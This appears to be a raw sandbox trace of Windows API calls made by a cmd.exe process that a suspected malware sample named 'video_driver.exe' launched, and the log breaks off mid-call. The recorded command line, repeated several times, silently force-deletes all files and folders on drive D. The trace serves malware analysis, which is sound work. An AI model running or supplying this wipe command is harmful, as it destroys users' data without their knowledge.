[0057.295] GetProcessHeap () returned 0x670000 [0057.295] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x682f60 | out: hHeap=0x670000) returned 1 [0057.295] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.296] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0057.296] _get_osfhandle (_FileHandle=1) returned 0x80 [0057.296] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 0 [0057.296] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.296] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.296] SetConsoleInputExeNameW () returned 0x1 [0057.296] GetConsoleOutputCP () returned 0x1b5 [0057.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.297] exit (_Code=0) Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x451dc000" os_pid = "0x868" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0x878 [0057.413] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fdfc | out: lpSystemTimeAsFileTime=0x18fdfc*(dwLowDateTime=0x1b5dcc0, dwHighDateTime=0x1d62400)) [0057.413] GetCurrentProcessId () returned 0x868 [0057.413] GetCurrentThreadId () returned 0x878 [0057.413] GetTickCount () returned 0x1146864 [0057.413] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdf4 | out: lpPerformanceCount=0x18fdf4*=17754689319) returned 1 [0057.415] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0057.415] __set_app_type (_Type=0x1) [0057.415] __p__fmode () returned 0x770331f4 [0057.415] __p__commode () returned 0x770331fc [0057.415] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0057.415] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0057.416] GetCurrentThreadId () returned 0x878 [0057.416] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x878) returned 0x60 [0057.416] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.416] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0057.416] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.416] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd8c | out: phkResult=0x18fd8c*=0x0) returned 0x2 [0057.417] VirtualQuery (in: lpAddress=0x18fdc3, lpBuffer=0x18fd5c, dwLength=0x1c | out: lpBuffer=0x18fd5c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.417] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fd5c, dwLength=0x1c | out: lpBuffer=0x18fd5c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0057.417] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fd5c, dwLength=0x1c | out: lpBuffer=0x18fd5c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0057.417] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fd5c, dwLength=0x1c | out: lpBuffer=0x18fd5c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.417] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fd5c, dwLength=0x1c | out: lpBuffer=0x18fd5c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.417] GetConsoleOutputCP () returned 0x1b5 [0057.417] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.417] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0057.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.417] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0057.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.418] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0057.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.418] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.418] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.418] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.419] GetEnvironmentStringsW () returned 0x4220f8* [0057.419] GetProcessHeap () returned 0x410000 [0057.419] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xaca) returned 0x422bd0 [0057.419] FreeEnvironmentStringsW (penv=0x4220f8) returned 1 [0057.419] GetProcessHeap () returned 0x410000 [0057.419] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x421898 [0057.419] GetEnvironmentStringsW () returned 0x4220f8* [0057.419] GetProcessHeap () returned 0x410000 [0057.419] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xaca) returned 0x4236a8 [0057.419] FreeEnvironmentStringsW (penv=0x4220f8) returned 1 [0057.419] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ecfc | out: phkResult=0x18ecfc*=0x68) returned 0x0 [0057.419] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x0, lpData=0x18ed08*=0x0, lpcbData=0x18ed00*=0x1000) returned 0x2 [0057.419] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x1, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x0, lpData=0x18ed08*=0x1, lpcbData=0x18ed00*=0x1000) returned 0x2 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x0, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x40, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x40, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x0, lpData=0x18ed08*=0x40, lpcbData=0x18ed00*=0x1000) returned 0x2 [0057.420] RegCloseKey (hKey=0x68) returned 0x0 [0057.420] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ecfc | out: phkResult=0x18ecfc*=0x68) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x0, lpData=0x18ed08*=0x40, lpcbData=0x18ed00*=0x1000) returned 0x2 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x1, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x0, lpData=0x18ed08*=0x1, lpcbData=0x18ed00*=0x1000) returned 0x2 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x0, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x9, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x4, lpData=0x18ed08*=0x9, lpcbData=0x18ed00*=0x4) returned 0x0 [0057.420] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed04, lpData=0x18ed08, lpcbData=0x18ed00*=0x1000 | out: lpType=0x18ed04*=0x0, lpData=0x18ed08*=0x9, lpcbData=0x18ed00*=0x1000) returned 0x2 [0057.420] RegCloseKey (hKey=0x68) returned 0x0 [0057.421] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b66 [0057.421] srand (_Seed=0x5eb34b66) [0057.421] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q" [0057.421] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q" [0057.421] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.421] GetProcessHeap () returned 0x410000 [0057.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x4220f8 [0057.421] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x422100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0057.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.421] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.421] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0057.421] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0057.421] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0057.421] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0057.421] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0057.422] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0057.422] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0057.422] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.422] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0057.422] GetProcessHeap () returned 0x410000 [0057.422] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x422bd0 | out: hHeap=0x410000) returned 1 [0057.422] GetEnvironmentStringsW () returned 0x422310* [0057.422] GetProcessHeap () returned 0x410000 [0057.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xae2) returned 0x424c70 [0057.422] FreeEnvironmentStringsW (penv=0x422310) returned 1 [0057.422] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.422] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.422] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0057.422] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.422] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.422] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.422] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.422] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.422] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.422] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.422] GetProcessHeap () returned 0x410000 [0057.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x54) returned 0x4217c8 [0057.422] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fac8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.423] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18fac8, lpFilePart=0x18fac4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18fac4*="Desktop") returned 0x25 [0057.423] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.423] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f844 | out: lpFindFileData=0x18f844*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x425760 [0057.423] FindClose (in: hFindFile=0x425760 | out: hFindFile=0x425760) returned 1 [0057.423] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f844 | out: lpFindFileData=0x18f844*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x108960, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x108960, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x425760 [0057.423] FindClose (in: hFindFile=0x425760 | out: hFindFile=0x425760) returned 1 [0057.423] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0057.423] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f844 | out: lpFindFileData=0x18f844*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x425760 [0057.424] FindClose (in: hFindFile=0x425760 | out: hFindFile=0x425760) returned 1 [0057.424] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0057.424] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0057.424] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0057.424] GetProcessHeap () returned 0x410000 [0057.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424c70 | out: hHeap=0x410000) returned 1 [0057.424] GetEnvironmentStringsW () returned 0x424180* [0057.424] GetProcessHeap () returned 0x410000 [0057.424] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb36) returned 0x425fa0 [0057.424] FreeEnvironmentStringsW (penv=0x424180) returned 1 [0057.424] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.424] GetProcessHeap () returned 0x410000 [0057.424] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4217c8 | out: hHeap=0x410000) returned 1 [0057.424] GetProcessHeap () returned 0x410000 [0057.424] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400e) returned 0x426ae0 [0057.425] GetProcessHeap () returned 0x410000 [0057.425] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa0) returned 0x422e50 [0057.425] GetProcessHeap () returned 0x410000 [0057.425] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426ae0 | out: hHeap=0x410000) returned 1 [0057.425] GetConsoleOutputCP () returned 0x1b5 [0057.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.505] GetUserDefaultLCID () returned 0x409 [0057.505] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fc08, cchData=128 | out: lpLCData="0") returned 2 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fc08, cchData=128 | out: lpLCData="0") returned 2 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fc08, cchData=128 | out: lpLCData="1") returned 2 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0057.506] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0057.506] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0057.507] GetProcessHeap () returned 0x410000 [0057.507] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x422ef8 [0057.507] GetConsoleTitleW (in: lpConsoleTitle=0x422ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0057.508] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.508] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0057.508] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0057.508] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0057.508] GetProcessHeap () returned 0x410000 [0057.508] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x426ae0 [0057.509] GetProcessHeap () returned 0x410000 [0057.509] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x42aaf8 [0057.509] GetProcessHeap () returned 0x410000 [0057.509] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a) returned 0x4257e0 [0057.509] GetEnvironmentVariableW (in: lpName="p IN (\"D", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="CD") returned 13 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="ERRORLEVEL") returned 11 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="CMDEXTVERSION") returned 13 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="CMDCMDLINE") returned 13 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="DATE") returned 12 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="TIME") returned -4 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="RANDOM") returned -2 [0057.509] _wcsicmp (_String1="p IN (\"D", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.509] GetProcessHeap () returned 0x410000 [0057.509] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4257e0 | out: hHeap=0x410000) returned 1 [0057.509] GetProcessHeap () returned 0x410000 [0057.509] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42aaf8 | out: hHeap=0x410000) returned 1 [0057.510] GetProcessHeap () returned 0x410000 [0057.510] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x42aaf8 [0057.510] GetProcessHeap () returned 0x410000 [0057.510] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42aaf8 | out: hHeap=0x410000) returned 1 [0057.510] GetProcessHeap () returned 0x410000 [0057.510] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426ae0 | out: hHeap=0x410000) returned 1 [0057.510] _wcsicmp (_String1="if", _String2=")") returned 64 [0057.510] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0057.510] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0057.510] _wcsicmp (_String1="IF", _String2="if") returned 0 [0057.510] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0057.510] GetProcessHeap () returned 0x410000 [0057.510] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423110 [0057.510] GetProcessHeap () returned 0x410000 [0057.510] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x41ffc0 [0057.511] GetProcessHeap () returned 0x410000 [0057.511] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x20) returned 0x4257e0 [0057.511] GetProcessHeap () returned 0x410000 [0057.511] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4257e0, Size=0x16) returned 0x421800 [0057.511] GetProcessHeap () returned 0x410000 [0057.512] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x421800) returned 0x16 [0057.512] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0057.512] GetProcessHeap () returned 0x410000 [0057.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423170 [0057.512] GetProcessHeap () returned 0x410000 [0057.512] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4231d0 [0057.512] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0057.512] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0057.513] GetProcessHeap () returned 0x410000 [0057.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x4231f0 [0057.513] GetProcessHeap () returned 0x410000 [0057.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x4257e0 [0057.513] GetProcessHeap () returned 0x410000 [0057.513] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4257e0, Size=0x14) returned 0x423210 [0057.513] GetProcessHeap () returned 0x410000 [0057.513] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x423210) returned 0x14 [0057.513] _wcsicmp (_String1="del", _String2=")") returned 59 [0057.513] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0057.513] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0057.513] _wcsicmp (_String1="IF", _String2="del") returned 5 [0057.513] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0057.513] _wcsicmp (_String1="REM", _String2="del") returned 14 [0057.513] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0057.513] GetProcessHeap () returned 0x410000 [0057.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423230 [0057.513] GetProcessHeap () returned 0x410000 [0057.513] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x41ffd8 [0057.514] GetProcessHeap () returned 0x410000 [0057.514] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x423290 [0057.515] GetProcessHeap () returned 0x410000 [0057.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x4232c0 [0057.515] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0057.515] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0057.515] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0057.515] GetProcessHeap () returned 0x410000 [0057.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423320 [0057.515] GetProcessHeap () returned 0x410000 [0057.515] RtlAllocateHeap 